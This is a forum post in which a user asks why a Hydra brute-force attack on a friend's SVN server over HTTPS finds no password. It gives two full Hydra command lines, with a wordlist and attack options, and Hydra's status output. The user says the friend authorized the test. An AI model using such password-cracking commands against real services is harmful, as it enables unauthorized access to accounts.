Ok, I'm back, with another question.
My friend has a SVN server. You can connect to it using https://xxx.xxxx.xxx.xx/
I asked if I can crack it and he set me up an account just to crack it. Here is what I have in my Hydra command line...
Hydra -l hackme -P /pentest/wireless/aircrack-ng/test/general.lst -e ns -t 10 -f -s -vV xx.xxx.xx.xxx https-get https://xx.xxx.xx.xxx/svn/ -o Output.txt
Then when I start the command, I just get this..
Hydra v5.4 (c) 2006......
[DATA] 10 tasks, 1 servers, 2293 login tries (1l:1/p:2293), ~229 tries per task
[DATA] attacking service http-get on prot 443
[STATUS] 849.00 tries/min, 849 tries in 00:01h, 1444 todo in 00:02h
[STATUS] 767.50 tries/min, 1535 tries in 00:02h, 758 todo in 00:01h
[STATUS] 726.00 tries/min, 2178 tries in 00:03h, 115 todo in 00:01h
[STATUS] attack finished for xx.xxx.xx.xxx (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-10-11 15:16:48
And the output has nothing written into it. I also tried the command
Hydra -l hackme -P /pentest/wireless/aircrack-ng/test/general.lst -e ns -t 10 -f -s -vV xx.xxx.xx.xxx https-get / -o Output.txt
But it outputs a bunch of wrong passwords.
Any ideas?